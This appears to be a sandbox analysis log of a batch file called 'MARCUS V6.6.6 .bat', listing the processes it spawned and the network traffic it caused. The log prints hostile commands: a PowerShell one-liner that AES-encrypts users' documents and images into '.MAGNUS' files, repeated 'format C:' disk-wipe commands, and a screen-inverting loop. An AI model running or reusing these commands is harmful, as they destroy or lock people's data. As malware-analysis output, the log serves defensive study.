"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7732,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7948 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "11204" "1876" "1792" "1880" "0" "0" "1884" "0" "0" "0" "0" "0"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat" "
C:\Windows\system32\chcp.com
chcp 1250
C:\Windows\system32\mode.com
mode 85,30
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "$klucz=New-Object Byte[] 32; (New-Object Security.Cryptography.RNGCryptoServiceProvider).GetBytes($klucz); ls C:\Users -Recurse -Include *.doc,*.xls,*.jpg | % { [IO.File]::WriteAllBytes($_.FullName+'.MAGNUS', (New-Object Security.Cryptography.AesManaged).CreateEncryptor().TransformFinalBlock([IO.File]::ReadAllBytes($_),0,$_.Length) }"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\cdffd5b55a98432da6ea9da6b95c1e9d /t 3912 /p 4436
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fff2496dcf8,0x7fff2496dd04,0x7fff2496dd10
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1960 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1644,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2212 /prefetch:3
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2436,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2604 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3232,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3304 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4240,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3844 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4732,i,8157082681163647878,7031712125999653017,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4704 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat" "
C:\Windows\system32\chcp.com
chcp 1250
C:\Windows\system32\mode.com
mode 85,30
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Inverter { [DllImport(\"user32.dll\")] public static extern int InvertRect(IntPtr hDC, ref System.Drawing.Rectangle lprc); }'; $rect = [System.Drawing.Rectangle]::FromLTRB(0,0,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); while($true) { [Inverter]::InvertRect([IntPtr]::Zero, [ref]$rect); Start-Sleep -Milliseconds 50 }"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0aj035jz\0aj035jz.cmdline"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
C:\Windows\system32\chcp.com
chcp 1250
C:\Windows\system32\mode.com
mode 85,30
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Inverter { [DllImport(\"user32.dll\")] public static extern int InvertRect(IntPtr hDC, ref System.Drawing.Rectangle lprc); }'; $rect = [System.Drawing.Rectangle]::FromLTRB(0,0,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); while($true) { [Inverter]::InvertRect([IntPtr]::Zero, [ref]$rect); Start-Sleep -Milliseconds 50 }"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ige4gybm\ige4gybm.cmdline"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
C:\Windows\system32\chcp.com
chcp 1250
C:\Windows\system32\mode.com
mode 85,30
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\format.com
format C: /fs:NULL /p:3 /q
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 8.8.8.8:53 | www.mediafire.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 150.171.28.11:80 | edge.microsoft.com | tcp |
| US | 104.17.151.117:443 | www.mediafire.com | udp |
| DE | 142.250.185.110:443 | clients2.google.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.28.11:80 | edge.microsoft.com | tcp |
| US | 104.17.151.117:443 | www.mediafire.com | tcp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 104.17.151.117:443 | www.mediafire.com | tcp |
| DE | 142.250.185.110:443 | clients2.google.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| GB | 95.101.143.218:443 | copilot.microsoft.com | tcp |
| US | 8.8.8.8:53 | the.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | the.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | static.mediafire.com | udp |
| US | 104.21.42.32:443 | the.gatekeeperconsent.com | udp |
| DE | 142.250.185.110:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | privacy.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | privacy.gatekeeperconsent.com | udp |
| US | 104.17.151.117:443 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | btloader.com | udp |
| US | 8.8.8.8:53 | www.ezojs.com | udp |
| US | 8.8.8.8:53 | www.ezojs.com | udp |
| US | 104.17.151.117:443 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| US | 8.8.8.8:53 | translate.google.com | udp |
| US | 172.67.170.144:443 | www.ezojs.com | udp |
| US | 104.21.42.32:443 | privacy.gatekeeperconsent.com | udp |
| US | 172.67.41.60:443 | btloader.com | tcp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| US | 8.8.8.8:53 | cdn.amplitude.com | udp |
| DE | 142.250.186.78:443 | translate.google.com | tcp |
| US | 104.17.151.117:443 | static.mediafire.com | tcp |
| US | 104.17.151.117:443 | static.mediafire.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| DE | 18.245.86.111:443 | cdn.amplitude.com | tcp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.21.42.32:443 | privacy.gatekeeperconsent.com | udp |
| US | 8.8.8.8:53 | cdn.econventa.com | udp |
| US | 8.8.8.8:53 | cdn.econventa.com | udp |
| US | 8.8.8.8:53 | ag.dns-finder.com | udp |
| US | 8.8.8.8:53 | ag.dns-finder.com | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 8.8.8.8:53 | ad-delivery.net | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| US | 8.8.8.8:53 | translate.googleapis.com | udp |
| US | 104.22.4.65:443 | ad-delivery.net | tcp |
| US | 104.22.4.65:443 | ad-delivery.net | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| DE | 172.217.23.106:443 | translate.googleapis.com | tcp |
| US | 104.21.42.32:443 | privacy.gatekeeperconsent.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| DE | 142.250.186.129:443 | clients2.googleusercontent.com | tcp |
| US | 104.21.42.32:443 | privacy.gatekeeperconsent.com | tcp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 8.8.8.8:53 | api.amplitude.com | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 8.8.8.8:53 | api.btloader.com | udp |
| US | 52.32.205.107:443 | api.amplitude.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | tcp |
| US | 8.8.8.8:53 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| GB | 2.19.252.99:443 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 52.32.205.107:443 | api.amplitude.com | tcp |
| GB | 2.19.252.99:443 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | tcp |
| GB | 95.101.143.210:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | cdn.econventa.com | udp |
| US | 8.8.8.8:53 | cdn.econventa.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 172.67.69.81:443 | cdn.econventa.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| US | 8.8.8.8:53 | g.ezoic.net | udp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 104.21.42.32:443 | privacy.gatekeeperconsent.com | udp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 8.8.8.8:53 | go.ezodn.com | udp |
| US | 8.8.8.8:53 | go.ezodn.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 172.67.170.144:443 | www.ezojs.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | econventa.com | udp |
| US | 8.8.8.8:53 | econventa.com | udp |
| US | 104.17.151.117:443 | static.mediafire.com | udp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | translate-pa.googleapis.com | udp |
| US | 172.67.142.121:443 | go.ezodn.com | udp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| DE | 216.58.212.170:443 | translate-pa.googleapis.com | tcp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| DE | 216.58.212.170:443 | translate-pa.googleapis.com | tcp |
| DE | 103.231.98.105:443 | hbopenbid.pubmatic.com | tcp |
| DE | 3.72.78.234:443 | btlr.sharethrough.com | tcp |
| DE | 3.72.78.234:443 | btlr.sharethrough.com | tcp |
| DE | 3.72.78.234:443 | btlr.sharethrough.com | tcp |
| DE | 3.72.78.234:443 | btlr.sharethrough.com | tcp |
| DE | 3.72.78.234:443 | btlr.sharethrough.com | tcp |
| DE | 216.58.206.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.mediafiredls.com | udp |
| US | 8.8.8.8:53 | www.mediafiredls.com | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | ad.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | ad.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| IE | 34.253.143.35:443 | ad.crwdcntrl.net | tcp |
| US | 172.67.73.78:443 | www.mediafiredls.com | tcp |
| US | 13.107.253.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 13.107.253.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 13.107.253.64:443 | edgeassetservice.azureedge.net | tcp |
| DE | 65.9.66.97:443 | tags.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| DE | 142.250.186.78:443 | fundingchoicesmessages.google.com | tcp |
| DE | 103.231.98.105:443 | hbopenbid.pubmatic.com | tcp |
| DE | 3.72.78.234:443 | btlr.sharethrough.com | tcp |
| DE | 3.72.78.234:443 | btlr.sharethrough.com | tcp |
| DE | 3.72.78.234:443 | btlr.sharethrough.com | tcp |
| DE | 3.72.78.234:443 | btlr.sharethrough.com | tcp |
| DE | 3.72.78.234:443 | btlr.sharethrough.com | tcp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| DE | 216.58.212.170:443 | translate-pa.googleapis.com | tcp |
| DE | 142.250.186.78:443 | fundingchoicesmessages.google.com | udp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| FR | 13.37.187.223:443 | g.ezoic.net | tcp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| IE | 54.220.144.202:443 | bcp.crwdcntrl.net | tcp |
